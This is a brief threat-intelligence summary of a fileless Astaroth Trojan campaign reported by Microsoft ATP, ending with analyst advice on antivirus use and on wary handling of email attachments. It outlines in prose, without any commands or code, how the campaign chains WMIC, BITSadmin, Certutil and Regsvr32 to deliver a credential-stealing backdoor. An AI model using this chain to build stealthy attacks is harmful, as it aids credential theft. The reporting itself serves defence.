The ATP team at Microsoft has verified the credential-stealing malware which spreads the Astaroth Trojan and sets its sights on Windows users. An “invisible man” tactic is used to make the malware difficult to detect; this involves only running files within the attack chain that would normally be recognized as real system tools. The backdoor is capable of carrying out tasks such as keylogging and clipboard monitoring as well as obtaining login credentials. What gives it notoriety though is how it makes use of living off the land binaries (LOLbins). In this campaign involving Microsoft, the final payload is delivered through the Windows Management Instrumentation Command-line tool (WMIC), the BITSadmin command-line tool, the Certutil Certificate Services command-tool, the Regsvr32 command-line utility, and the Userinit system tool. For this to work, a user would still have to open a spearphishing email that includes a link to a malicious ZIP archive. The process is quite obscure, it starts by the files running a BAT command-line, which then runs WMIC. Then WMIC downloads and runs an unintelligible XSL file, that subsequently runs WMIC once again to which a second XSL file is downloaded. From there, the BITSadmin tool is used to add more payloads that are able to be decoded through Certutil. One of the many payloads is a DLL file that runs within the Regsvt32 tools parameters. It is likely that this will not be the last campaign involving Astaroth as fileless malware has begun to rise in popularity.
Analyst Notes
Microsoft users are suggested to use the Windows Defender Antivirus program. However, if they do not choose to use it, they are advised to remain extremely cautious when receiving emails from unknown senders that include .lnk or .zip files.
